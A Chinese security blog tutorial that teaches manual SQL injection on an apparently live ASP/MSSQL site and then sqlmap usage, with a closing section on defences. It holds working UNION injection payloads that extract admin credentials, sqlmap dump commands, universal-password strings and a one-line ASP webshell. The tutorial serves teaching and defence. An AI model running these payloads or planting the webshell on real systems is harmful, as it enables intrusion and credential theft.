热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

[网络安全提高篇]一〇六.SQL注入之手工注入和SQLMAP入门案例详解

当您阅读到该篇文章时,作者已经将“网络安全自学篇”设置成了收费专栏,首先说声抱歉。感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很



当您阅读到该篇文章时,作者已经将“网络安全自学篇”设置成了收费专栏,首先说声抱歉。感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很多精力去学习和总结。由于在外读书且需要养娃,所以按最低价9.9元设置成了收费专栏,赚点奶粉钱,感谢您的抬爱。当然,如果您还是一名在读学生或经济拮据,可以私聊我或去github下载对应的免费文章,更希望您能进步,一起加油喔!

接下来我会接着之前的内容继续分享,“网络安全提高班”新的100篇文章即将开启,包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史。换专业确实挺难的,Web渗透也是块硬骨头,但我也试试,看看自己未来四年究竟能将它学到什么程度,漫漫长征路,偏向虎山行。享受过程,一起加油~

前文带领大家Oracle数据库注入漏洞和致命问题,包括各种类型的注入知识。这篇文章将详细介绍SQL注入知识,结合案例对比手工SQL注入和SQLMAP的基本用法,案例和基础原理的结合能加深大家对SQL注入的理解。希望这篇文章对您有帮助,更希望帮助更多安全或红蓝对抗的初学者,也推荐大家去使用Cyberbit Range的靶场,且看且珍惜。


文章目录


  • 一.手工SQL注入
  • 二.SQLMAP基础用法
  • 三.防御措施
  • 四.总结

作者作为网络安全的小白,分享一些自学基础教程给大家,主要是关于安全工具和实践操作的在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力,点赞、评论、私聊均可,一起加油喔~


  • 自学篇工具:https://github.com/eastmountyxz/NetworkSecuritySelf-study
  • 系统安全:https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis

声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。


提高篇:(自学系列100篇目录放在文章末尾)


  • [网络安全提高班] 一〇一.网络空间安全普及和医疗数据安全防护总结
  • [网络安全提高篇] 一〇二.Metasploit技术之基础用法万字详解及MS17-010漏洞复现
  • [网络安全提高篇] 一〇三.Metasploit后渗透技术之信息收集、权限提权、移植漏洞模块和后门
  • [网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解(SQL注入、XSS攻击、文件上传漏洞)
  • [网络安全提高篇] 一〇五.SQL注入之揭秘Oracle数据库注入漏洞和致命问题(联合Cream老师)
  • [网络安全提高篇] 一〇六.SQL注入之手工注入和SQLMAP入门案例详解
  • [网络安全提高篇] 一〇七.安全威胁框架理解及勒索病毒取证溯源分析(蓝队)



一.手工SQL注入

SQL注入是比较常见的网络攻击方式之一,它是针对程序员编写代码时的疏忽,对用户输入数据的合法性没有判断或过滤不严,攻击者通过构造不同的SQL语句来实现对数据库的任意操作,包括无账号登录、查询删除数据、篡改数据库,甚至如果数据库的用户权限足够大,还可以对操作系统执行操作。

SQL注入可以分为平台层注入和代码层注入,前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤。这篇文章主要结合案例,分享手工SQL注入和SQLMAP的基本用法,希望对您有所帮助,同时推荐Justin Clarke的《SQL注入攻击与防御》书籍。



下面通过一个简单的例子从数据库原理知识解读SQL注入攻防原理,内容比较简单。假设存在一个网址能正常显示内容,其数据库是MSSQL,网站为ASP。


  • http://xxxxx/show.asp?code=115

对应的后台SQL语句可能如下:


  • select … from table where code=‘115’ and xxxx;

第一步,数据库如何判断注入点
判断注入点的方法很多,比如show.asp?code=115’ 加单引号,show.asp?code=115-1 减1,这里介绍一个经典的方法。


  • http://xxxxx/show.asp?code=115’ and 1=1 - - (正常显示)
    对应的SQL语句:
    select … from table where code=‘115’ and 1=1 - - and xxxx;
    其中,单引号(’)匹配code='115,然后and连接,1=1恒成立,SQL注释(- -)掉后面语句。

  • http://xxxxx/show.asp?code=115’ and 1=2 - - (错误显示)
    对应的SQL语句:
    select … from table where code=‘115’ and 1=2 - - and xxxx;
    单引号(’)匹配code='115,然后and连接,1=2恒错误,注释(–)掉后面语句。

PS:注释(- -)中间加了个空格,否则markdown会显示一条横线。



第二步,数据库如何判断字段总数 order by
基本方法如下:


  • http://xxxxx/show.asp?code=115’ order by 1 - - (正常显示)
    对应的SQL语句:
    select … from table where code=‘115’ order by 1 – and xxxx;
    按照1个字段进行排序,正常显示表示该URL对应的SQL语句至少一个字段。

  • http://xxxxx/show.asp?code=115’ order by 10 - - (正常显示)
    对应的SQL语句:
    select … from table where code=‘115’ order by 10 - - and xxxx;
    依次按照字段增加往上进行排序,直至order by 11提示错误,此时表示共10个字段。

  • http://xxxxx/show.asp?code=115’ order by 11 - - (错误显示)



第三步,数据库获取显示位,通过union实现
在得到字段个数后,需要获取字段位置,则使用union或union all。其中union表示将两个select结果整体显示,并合并相同的结果,union all显示全部结果。例如:

在这里插入图片描述

具体方法如下:


  • http://xxxxx/show.asp?code=115’ union all select null,…,null - -
    正常显示,共10个null,表示通配符,如果9个null会报错,需对应10个字段。

  • http://xxxxx/show.asp?code=115’ union all select 1,…,null - -
    依次替换成数字,测试哪几个字段有结果,如果报错则替换回null。最终的结果为:
    show.asp?code=115’ union all select 1,null,3,null,null,6,7,8,9,10 - -
    对应的SQL语句为:
    select … from table where code=‘115’ union all select 1,null,3,null,null,6,7,8,9,10 - - xxxx;

  • http://xxxxx/show.asp?code=-1’ union all select 1,…,null - -
    然后将数字115替换成-1,一个不存在的界面,则会显示如下所示结果,可以看到附件显示对应的值7、8、9,再想办法将我们需要的结果在这里显示即可,这些数据都是从后台数据库中查询出来的。

在这里插入图片描述



第四步,数据库显示错误网页及对应数据db_name
该网站使用的数据库为MSSQL,则一定特定的字段需要知道:


  • host_name():连接数据库服务器的计算机名称

  • @@version:获取数据库版本号

  • db_name():数据库的库名称

  • @@servername:当前数据库计算机的名称=host_name()

  • http://xxxxx/show.asp?code=-1’ union all select 1,null,3,null,null,6,host_name(),@@version,db_name(),10 - -

输出结果如下所示:


  • 附件1:AYD
  • 附件2:Microsoft SQL Server…
  • 附件3:ahykd_new

其中数据库的名称就是ahykd_new,接下来相同的道理获取数据库所有表及列。



第五步,数据库获取表名及列名,Python爬虫引入
SQL Server自带系统对象表,当前数据库所有字段。


  • sysobjects 表名
  • syscolumns 列名

其中,name表示对象名(表名),id表示表编号,type表示对象类型,其值为U表示用户表,S表示系统表,C约束,PK主键等。

sysobjects 和 syscolumns 之间以id互相对应,一个表名在sysobjects得到id后可以在syscolumns找到它的列名。重点知识:


  • 查看所有表名语句
    select name from sysobjects where type=‘U’;
  • 询表table1的所有字段名称
    select name from syscolumns where id=object_id(‘table1’);

具体渗透方法如下:


  • http://xxxxx/show.asp?code=-1’ union all
    select 1,null,3,null,null,6,7,8,
    (select top 1 name from sysobjects where type=‘U’),10 - -

此时输出结果如下所示:


  • 附件1:7
  • 附件2:8
  • 附件3:kc_jxjd

其中top 1 name用于输出1个字段(相当于MySQL使用limit 1),sysobjects中u为用户表,count(*)可以统计总共87个表。

PS:问大家一个问题,现在是获取1个表,那么如何获取其他表呢?


  • http://xxxxx/show.asp?code=-1’ union all
    select 1,null,3,null,null,6,7,8, (select top 1 name from
    (select top 2 name from sysobjects where type=‘U’ order by desc) a
    order by 1 asc),10 - -

通过子查询一个升序,一个降序获取第二个值,同理第三个top 3。下面通过Python定义一个Selenium爬虫不断访问top n,获取所有的表名,代码如下。

在这里插入图片描述

注意,Python应用在Web渗透领域是很常见且有效的。分析输出的所有表名,可以发现usr为后台登录表。


  • 后台登录表:usr


第六步,数据库获取登录表usr字段 id=object_id(‘usr’)
具体方法如下:


  • http://xxxxx/show.asp?code=-1’ union all
    select 1,null,3,null,null,6,7,8,
    (select top 1 name from syscolmns where id=object_id(‘usr’)),10 - -

输出结果如下所示:


  • 附件1:7
  • 附件2:8
  • 附件3:answer

其中top 1 name用于输出1个字段,表usr的一个列表。


  • 核心SQL语句获取不同的列名:
    (select top 1 name from (select top 3 name from syscolumns where id=object_id(‘usr’) order by asc) a order by 1 desc)

输出结果如下所示:


  • 附件1:7
  • 附件2:8
  • 附件3:dic_roll

同理,也可以借助Python获取所有字段,如果字段少,手工即可测试出来,count(*)返回字段个数。最后发现:


  • 用户名字段为usr_name,密码为passwd


第七步,获取数据库返回用户名和密码
具体方法如下:


  • http://xxxxx/show.asp?code=-1’ union all
    select 1,null,3,null,null,6,7,8,(select top 1 usr_name from usr),10 - -

输出结果如下所示:


  • 附件1:7
  • 附件2:8
  • 附件3:2016001

输出用户名2016001,再搜索密码。


  • http://xxxxx/show.asp?code=-1’ union all
    select 1,null,3,null,null,6,7,8,
    (select passwd from usr where usr_name=‘2016001’),10 - -

输出结果如下所示:


  • 附件1:7
  • 附件2:8
  • 附件3:123456

输出用户名2016001,密码123456,此时即可登录,通过Python可以获取所有值。



第八步,登录系统并获取WebShell
登录后台基本完成,接下来分享SQLMAP基础用法和如何进行SQL防御。


  • <%eval request(“Nana”) %>



二.SQLMAP基础用法

SQLMAP是一款非常强大的开源渗透测试工具,用于自动检测和利用SQL注入漏洞控制数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,通过外部连接访问数据库底层文件系统和操作系统,并执行命令实现渗透。由于它是通过Python语言开发完成,需要安装Python环境,下面开始安装SQLMAP,建议大家直接用Kali


  • 方法一:调用Pyhon命令pip install sqlmap安装
  • 方法二:从Github中获取SQLMAP进行安装
    https://github.com/sqlmapproject/sqlmap

在这里插入图片描述



漏洞检测
cd去到Python环境sqlmap文件夹下,运行命令:


  • python sqlmap.py -u “http://…/tztgxx.aspx?code=115”

运行结果如下图所示,-u表示网址url。

在这里插入图片描述

输出GET的四种注入类型,分别为:boolean-based blind、stacked queries、time-based blind、UNION query。这里你可能会发现和我们的第一篇文章手动讲解SQL注入类似,包括:AND 1327=1327、UNION ALL等。输出结果:


  • 操作系统:Windows 2000
  • Web应用技术:ASP.NET,ASP.NET 2.0, Microsoft IIS 5.0
  • 数据库:Microsoft SQL Server 2000

在这里插入图片描述





接着我们以上面的案例进行基础用法讲解,这样能加深大家对SQL注入的理解。

第一步,获取所有数据库


  • 参数:–dbs
  • 命令:python sqlmap.py -u “http://…/tztgxx.aspx?code=115” --dbs

运行结果如下图所示,获取9个数据库,其中–dbs参数表示databases。

在这里插入图片描述



第二步,获取当前数据库


  • 参数:–current-db
  • 命令:python sqlmap.py -u “http://…/tztgxx.aspx?code=115” --current-db

运行结果如下图所示,获取9个数据库。其中–current-db参数表示当前数据库,相当于前文MSSQL的db_name()获取数据库字段。

在这里插入图片描述

输出结果:akykd_new
对应前文:


  • http://xxxxx/show.asp?code=-1’ union all
    select 1,null,3,null,null,6,host_name(),@@version,db_name(),10 - -

输出结果如下所示:


  • 附件3:ahykd_new

其中数据库的名称就是ahykd_new,接下来相同的道理获取数据库所有表及列。



第三步,获取数据库所有用户


  • 参数:–users
  • 命令:python sqlmap.py -u “http://…/tztgxx.aspx?code=115” --users

运行结果如下图所示,获取2个用户库。

在这里插入图片描述

输出结果:两个用户


  • BUILTIN\Adminstrators
  • sa


第四步,获取数据库当前用户


  • 参数:–current-user
  • 命令:python sqlmap.py -u “http://…/tztgxx.aspx?code=115” --current-user

运行结果如下图所示,获取当前数据库用户sa。

在这里插入图片描述



第五步,获取数据库所有用户和密码


  • 参数:–passwords
  • 命令:python sqlmap.py -u “http://…/tztgxx.aspx?code=115” --passwords

运行结果如下图所示,获取数据库用户和密码。

在这里插入图片描述

输出结果:


database management system users password hashes:
[ * ] BUILTIN\Administrators [1]:
password hash: NULL
[ * ] sa [1]:
password hash: 0x01006e27653a36bbc7907ec45a0060…




第六步,获取数据库所有表


  • 参数:-D ahykd_new --tables
  • 命令:python sqlmap.py -u “http://…/tztgxx.aspx?code=115” -D ahykd_new --tables

运行结果如下图所示,获取数据库ahykd_new的所有表,其中-D表示数据库,–tables表示所有表。

在这里插入图片描述

通过人为猜解,知道登录表为usr。对应前文:


  • http://xxxxx/show.asp?code=-1’ union all
    select 1,null,3,null,null,6,7,8,
    (select top 1 name from sysobjects where type=‘U’),10 –

输出结果如下所示:


  • 附件1:7
  • 附件2:8
  • 附件3:kc_jxjd

其中top 1 name用于输出1个字段,sysobjects中u为用户表。



第七步,获取数据库登录表所有字段


  • 参数:-D ahykd_new -T usr --columns
  • 命令:python sqlmap.py -u “http://…/tztgxx.aspx?code=115” -D ahykd_new -T usr --columns

运行结果如下图所示,获取数据库ahykd_new的登录表usr所有字段,其中-D表示数据库,-T表示表,–columns表示usr表所有列。

在这里插入图片描述

在这里插入图片描述

是不是感觉到了SQLMAP的强大,其中用户名usr_name、密码passwd。对应前文:


  • http://xxxxx/show.asp?code=-1’ union all
    select 1,null,3,null,null,6,7,8,
    (select top 1 name from syscolmns where id=object_id(‘usr’)),10 –

输出结果如下所示:


  • 附件1:7
  • 附件2:8
  • 附件3:answer

其中top 1 name用于输出1个字段,表usr的一个列表。



第八步,获取数据库登录表用户名和密码


  • 参数:-D ahykd_new -T usr -C “usr_name,password” --dump
  • 命令:python sqlmap.py -u “http://…/tztgxx.aspx?code=115” -D ahykd_new -T usr -C “usr_name,password” --dump

获取数据库ahykd_new的登录表usr所有字段,其中-D表示数据库,-T表示表,-C表示输出字段(usr_name、passwd),–dump输出所有值。

在这里插入图片描述

如果字段内容太多,可以设置输出个数,如10个用户名和密码。


  • 参数:-D ahykd_new -T usr -C “usr_name,passwd” --start 1 --stop 10 --dump
  • 命令:python sqlmap.py -u “http://…/tztgxx.aspx?code=115” -D ahykd_new -T usr -C “usr_name,passwd” --start 1 --stop 10 --dump

正常的输出结果例如下图所示,再通过md5解密即可。有时也会输出结果为空,报警告“the SQL query provided does not return any output”。

在这里插入图片描述




三.防御措施

上面通过数据库原理进行了详细的讲解,这种网站基本很少存在了,更多的网页都有相关的屏蔽的。比如:


  • 使用正则表达式过滤,在URL设置不允许非法字符,如单引号、等号、注释–、减号,提示非法参数;在URL设置不允许SQL常见的关键词,如and、select、or、insert等。
  • 严格限定参数类型和格式,明确参数检验的边界,必须在服务端正式处理之前对提交的数据的合法性进行检查,比如传递的id=115参数必须为数字才能正常跳转,否则跳转错误。

在这里插入图片描述


  • 安装Web防火墙,服务器启用SQL注入拦截功能,提示当前网页的 URL / POST / COOKIES中包含了特定的SQL字符而被防火墙拦截,因为可能通过POST、COOKIEs进行攻击,各方面都需要做到防御。

  • 采用预编译(PreparedStatement)语句集。由于它内置了处理SQL注入的能力,只能使用它的setXXX方法传值,无论你输入什么,都不会影响该SQL语句的语法结构,执行阶段只是把输入串作为数据处理,从而避免SQL注入问题。下面展示的就是典型采用 SQL语句预编译来防止SQL注入 。同样,PDO解决SQL注入的原理也是基于预编译。

String sql = "select id, no from user where id=?";
PreparedStatement ps = conn.prepareStatement(sql);
ps.setInt(1, id);
ps.executeQuery();

  • 使用Javascript在客户端进行不安全字符屏蔽,也可以在jsp中调用该函数检查是否包含非法字符,或使用正则表达式过滤传入的参数,防止SQL从URL注入。
  • 设置 Web 应用中用于连接数据库的用户对 Web 目录不允许有写权限,设置连接数据库的用户与数据库的系统管理员用户的权限有严格的区分(如不能执行 drop 等),并设置 Web 应用中用于连接数据库的用户不允许操作其他数据库。
  • 其他方法,包括防止万能密码(admin、‘or’=‘or’、‘or’ ‘1’=‘1’#)和弱口令,防止盲注、堆注入、COOKIE注入、宽字节注入等。





四.总结

写到这里,网络安全系列第四篇文章就介绍完毕,希望您喜欢,如果文章存在错误或不足之处,还请海涵。真心感觉自己要学习的知识好多,也有好多大神卧虎藏龙,开源分享。作为初学者,我们可能有差距,不论你之前是什么方向,是什么工作,是什么学历,是大学大专中专,亦或是高中初中,只要你喜欢安全,喜欢渗透,就朝着这个目标去努力吧!有差距不可怕,我们需要的是去缩小差距,去战斗,况且这个学习的历程真的很美,安全真的有意思。但切勿去做坏事,我们需要的是白帽子,是维护我们的网络,安全路上不忘初心,继续加油。

在这里插入图片描述

这篇文章中如果存在一些不足,还请海涵。作者作为网络安全初学者的慢慢成长路吧!希望未来能更透彻撰写相关文章。同时非常感谢参考文献中的安全大佬们的文章分享,深知自己很菜,得努力前行。

欢迎大家讨论,是否觉得这系列文章帮助到您!任何建议都可以评论告知读者,共勉。


  • 网络靶场:- https://github.com/eastmountyxz/CyberSecurityBox
  • 逆向分析:https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
  • 网络安全:https://github.com/eastmountyxz/NetworkSecuritySelf-study

2020年8月18新开的“娜璋AI安全之家”,主要围绕Python大数据分析、网络空间安全、人工智能、Web渗透及攻防技术进行讲解,同时分享CCF、SCI、南核北核论文的算法实现。娜璋之家会更加系统,并重构作者的所有文章,从零讲解Python和安全,写了近十年文章,真心想把自己所学所感所做分享出来,还请各位多多指教,真诚邀请您的关注!谢谢。

在这里插入图片描述

(By:Eastmount 2021-03-26 夜于武汉 http://blog.csdn.net/eastmount/ )



自学篇(建议直接跳转到正文):


  • [网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例
  • [网络安全自学篇] 二.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记
  • [网络安全自学篇] 三.Burp Suite工具安装配置、Proxy基础用法及暴库示例
  • [网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
  • [网络安全自学篇] 五.IDA Pro反汇编工具初识及逆向工程解密实战
  • [网络安全自学篇] 六.OllyDbg动态分析工具基础用法及Crakeme逆向
  • [网络安全自学篇] 七.快手视频下载之Chrome浏览器Network分析及Python爬虫探讨
  • [网络安全自学篇] 八.Web漏洞及端口扫描之Nmap、ThreatScan和DirBuster工具
  • [网络安全自学篇] 九.社会工程学之基础概念、IP获取、IP物理定位、文件属性
  • [网络安全自学篇] 十.论文之基于机器学习算法的主机恶意代码
  • [网络安全自学篇] 十一.虚拟机VMware+Kali安装入门及Sqlmap基本用法
  • [网络安全自学篇] 十二.Wireshark安装入门及抓取网站用户名密码(一)
  • [网络安全自学篇] 十三.Wireshark抓包原理(ARP劫持、MAC泛洪)及数据流追踪和图像抓取(二)
  • [网络安全自学篇] 十四.Python攻防之基础常识、正则表达式、Web编程和套接字通信(一)
  • [网络安全自学篇] 十五.Python攻防之多线程、C段扫描和数据库编程(二)
  • [网络安全自学篇] 十六.Python攻防之弱口令、自定义字典生成及网站暴库防护
  • [网络安全自学篇] 十七.Python攻防之构建Web目录扫描器及ip代理池(四)
  • [网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示(一)
  • [网络安全自学篇] 十九.Powershell基础入门及常见用法(一)
  • [网络安全自学篇] 二十.Powershell基础入门及常见用法(二)
  • [网络安全自学篇] 二十一.GeekPwn极客大赛之安全攻防技术总结及ShowTime
  • [网络安全自学篇] 二十二.Web渗透之网站信息、域名信息、端口信息、敏感信息及指纹信息收集
  • [网络安全自学篇] 二十三.基于机器学习的恶意请求识别及安全领域中的机器学习
  • [网络安全自学篇] 二十四.基于机器学习的恶意代码识别及人工智能中的恶意代码检测
  • [网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
  • [网络安全自学篇] 二十六.Shodan搜索引擎详解及Python命令行调用
  • [网络安全自学篇] 二十七.Sqlmap基础用法、CTF实战及请求参数设置(一)
  • [网络安全自学篇] 二十八.文件上传漏洞和Caidao入门及防御原理(一)
  • [网络安全自学篇] 二十九.文件上传漏洞和IIS6.0解析漏洞及防御原理(二)
  • [网络安全自学篇] 三十.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御(三)
  • [网络安全自学篇] 三十一.文件上传漏洞之Upload-labs靶场及CTF题目01-10(四)
  • [网络安全自学篇] 三十二.文件上传漏洞之Upload-labs靶场及CTF题目11-20(五)
  • [网络安全自学篇] 三十三.文件上传漏洞之绕狗一句话原理和绕过安全狗(六)
  • [网络安全自学篇] 三十四.Windows系统漏洞之5次Shift漏洞启动计算机
  • [网络安全自学篇] 三十五.恶意代码攻击溯源及恶意样本分析
  • [网络安全自学篇] 三十六.WinRAR漏洞复现(CVE-2018-20250)及恶意软件自启动劫持
  • [网络安全自学篇] 三十七.Web渗透提高班之hack the box在线靶场注册及入门知识(一)
  • [网络安全自学篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求(二)
  • [网络安全自学篇] 三十九.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法(三)
  • [网络安全自学篇] 四十.phpMyAdmin 4.8.1后台文件包含漏洞复现及详解(CVE-2018-12613)
  • [网络安全自学篇] 四十一.中间人攻击和ARP欺骗原理详解及漏洞还原
  • [网络安全自学篇] 四十二.DNS欺骗和钓鱼网站原理详解及漏洞还原
  • [网络安全自学篇] 四十三.木马原理详解、远程服务器IPC$漏洞及木马植入实验
  • [网络安全自学篇] 四十四.Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解
  • [网络安全自学篇] 四十五.病毒详解及批处理病毒制作(自启动、修改密码、定时关机、蓝屏、进程关闭)
  • [网络安全自学篇] 四十六.微软证书漏洞CVE-2020-0601 (上)Windows验证机制及可执行文件签名复现
  • [网络安全自学篇] 四十七.微软证书漏洞CVE-2020-0601 (下)Windows证书签名及HTTPS网站劫持
  • [网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
  • [网络安全自学篇] 四十九.Procmon软件基本用法及文件进程、注册表查看
  • [网络安全自学篇] 五十.虚拟机基础之安装XP系统、文件共享、网络快照设置及Wireshark抓取BBS密码
  • [网络安全自学篇] 五十一.恶意样本分析及HGZ木马控制目标服务器
  • [网络安全自学篇] 五十二.Windows漏洞利用之栈溢出原理和栈保护GS机制
  • [网络安全自学篇] 五十三.Windows漏洞利用之Metasploit实现栈溢出攻击及反弹shell
  • [网络安全自学篇] 五十四.Windows漏洞利用之基于SEH异常处理机制的栈溢出攻击及shell提取
  • [网络安全自学篇] 五十五.Windows漏洞利用之构建ROP链绕过DEP并获取Shell
  • [网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
  • [网络安全自学篇] 五十七.PE文件逆向之什么是数字签名及Signtool签名工具详解(一)
  • [网络安全自学篇] 五十八.Windows漏洞利用之再看CVE-2019-0708及Metasploit反弹shell
  • [网络安全自学篇] 五十九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及shell深度提权
  • [网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
  • [网络安全自学篇] 六十一.PE文件逆向之数字签名详细解析及Signcode、PEView、010Editor、Asn1View等工具用法(二)
  • [网络安全自学篇] 六十二.PE文件逆向之PE文件解析、PE编辑工具使用和PE结构修改(三)
  • [网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
  • [网络安全自学篇] 六十四.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)复现及详解
  • [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
  • [网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
  • [网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
  • [网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
  • [网络安全自学篇] 六十九.宏病毒之入门基础、防御措施、自发邮件及APT28样本分析
  • [网络安全自学篇] 七十.WannaCry勒索病毒复现及分析(三)蠕虫传播机制分析及IDA和OD逆向
  • [网络安全自学篇] 七十一.深信服分享之外部威胁防护和勒索病毒对抗
  • [网络安全自学篇] 七十二.逆向分析之OllyDbg动态调试工具(一)基础入门及TraceMe案例分析
  • [网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读
  • [网络安全自学篇] 七十四.APT攻击检测溯源与常见APT组织的攻击案例
  • [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
  • [网络安全自学篇] 七十六.逆向分析之OllyDbg动态调试工具(二)INT3断点、反调试、硬件断点与内存断点
  • [网络安全自学篇] 七十七.恶意代码与APT攻击中的武器(强推Seak老师)
  • [网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
  • [网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
  • [网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
  • [网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
  • [网络安全自学篇] 八十二.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)
  • [网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
  • [网络安全自学篇] 八十四.《Windows黑客编程技术详解》之VS环境配置、基础知识及DLL延迟加载详解
  • [网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入、APC注入)
  • [网络安全自学篇] 八十六.威胁情报分析之Python抓取FreeBuf网站APT文章(上)
  • [网络安全自学篇] 八十七.恶意代码检测技术详解及总结
  • [网络安全自学篇] 八十八.基于机器学习的恶意代码检测技术详解
  • [网络安全自学篇] 八十九.PE文件解析之通过Python获取时间戳判断软件来源地区
  • [网络安全自学篇] 九十.远控木马详解及APT攻击中的远控
  • [网络安全自学篇] 九十一.阿里云搭建LNMP环境及实现PHP自定义网站IP访问 (1)
  • [网络安全自学篇] 九十二.《Windows黑客编程技术详解》之病毒启动技术创建进程API、突破SESSION0隔离、内存加载详解(3)
  • [网络安全自学篇] 九十三.《Windows黑客编程技术详解》之木马开机自启动技术(注册表、计划任务、系统服务)
  • [网络安全自学篇] 九十四.《Windows黑客编程技术详解》之提权技术(令牌权限提升和Bypass UAC)
  • [网络安全自学篇] 九十五.利用XAMPP任意命令执行漏洞提升权限(CVE-2020-11107)


推荐阅读
  • 浅解XXE与Portswigger Web Sec
    XXE与PortswiggerWebSec​相关链接:​博客园​安全脉搏​FreeBuf​XML的全称为XML外部实体注入,在学习的过程中发现有回显的XXE并不多,而 ... [详细]
  • 背景应用安全领域,各类攻击长久以来都危害着互联网上的应用,在web应用安全风险中,各类注入、跨站等攻击仍然占据着较前的位置。WAF(Web应用防火墙)正是为防御和阻断这类攻击而存在 ... [详细]
  • 云计算安全,主要面临哪些威胁?
    云计算是一种新的计算方式,它依托于互联网,以网络技术、分布式计算为基础,实现按需自服务、快速弹性构建、服务可测量等特点的新一代计算方式。然而,任何以互联网为基础的应用都存在着一定危 ... [详细]
  • 开发笔记:深度探索!Android之OkHttp网络架构源码解析
    篇首语:本文由编程笔记#小编为大家整理,主要介绍了深度探索!Android之OkHttp网络架构源码解析相关的知识,希望对你有一定的参考价值。 ... [详细]
  • 缓冲区溢出实例(一)–Windows
    一、基本概念缓冲区溢出:当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被填满从而覆盖了相邻内存区域的数据。可以修改内存数据,造成进程劫持,执行恶意代码,获 ... [详细]
  • IIS6.0提供一个重新设计的万维网发布服务(WorldWideWebPublishingService)架构,可以帮助你为你的网站构建更好的性能、可靠、可扩展性(scalabil ... [详细]
  • Nginx简介Nginx(enginex)是一个高性能的HTTP和反向代理服务器,也是一个IMAPPOP3SMTP代理服务器。Nginx是由IgorSysoev为 ... [详细]
  • 本文介绍了绕过WAF的XSS检测机制的方法,包括确定payload结构、测试和混淆。同时提出了一种构建XSS payload的方法,该payload与安全机制使用的正则表达式不匹配。通过清理用户输入、转义输出、使用文档对象模型(DOM)接收器和源、实施适当的跨域资源共享(CORS)策略和其他安全策略,可以有效阻止XSS漏洞。但是,WAF或自定义过滤器仍然被广泛使用来增加安全性。本文的方法可以绕过这种安全机制,构建与正则表达式不匹配的XSS payload。 ... [详细]
  • 目录浏览漏洞与目录遍历漏洞的危害及修复方法
    本文讨论了目录浏览漏洞与目录遍历漏洞的危害,包括网站结构暴露、隐秘文件访问等。同时介绍了检测方法,如使用漏洞扫描器和搜索关键词。最后提供了针对常见中间件的修复方式,包括关闭目录浏览功能。对于保护网站安全具有一定的参考价值。 ... [详细]
  • Apache Shiro 身份验证绕过漏洞 (CVE202011989) 详细解析及防范措施
    本文详细解析了Apache Shiro 身份验证绕过漏洞 (CVE202011989) 的原理和影响,并提供了相应的防范措施。Apache Shiro 是一个强大且易用的Java安全框架,常用于执行身份验证、授权、密码和会话管理。在Apache Shiro 1.5.3之前的版本中,与Spring控制器一起使用时,存在特制请求可能导致身份验证绕过的漏洞。本文还介绍了该漏洞的具体细节,并给出了防范该漏洞的建议措施。 ... [详细]
  • 本篇内容主要讲解“JavaScript在网页设计中的嵌入应用方法是什么”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小 ... [详细]
  • python 英文关键词提取_如何提取文章的关键词(Python版)
    项目需求:我们采集来的文章没有关键词,在发布的时候无法设定标签,我们通过代码自动提取出文章的关键词,达到对数据加工的目的。 ... [详细]
  • php实现中文文件下载
    php教程|PHP源码php实现中文文件下载php教程-PHP源码php代码爱之谷2015源码,ubuntu16桌面,tomcat9解压缩半,python爬虫带页面,php批量删除 ... [详细]
  • 【工具篇】抓包中的王牌工具—Fiddler (1环境搭建)
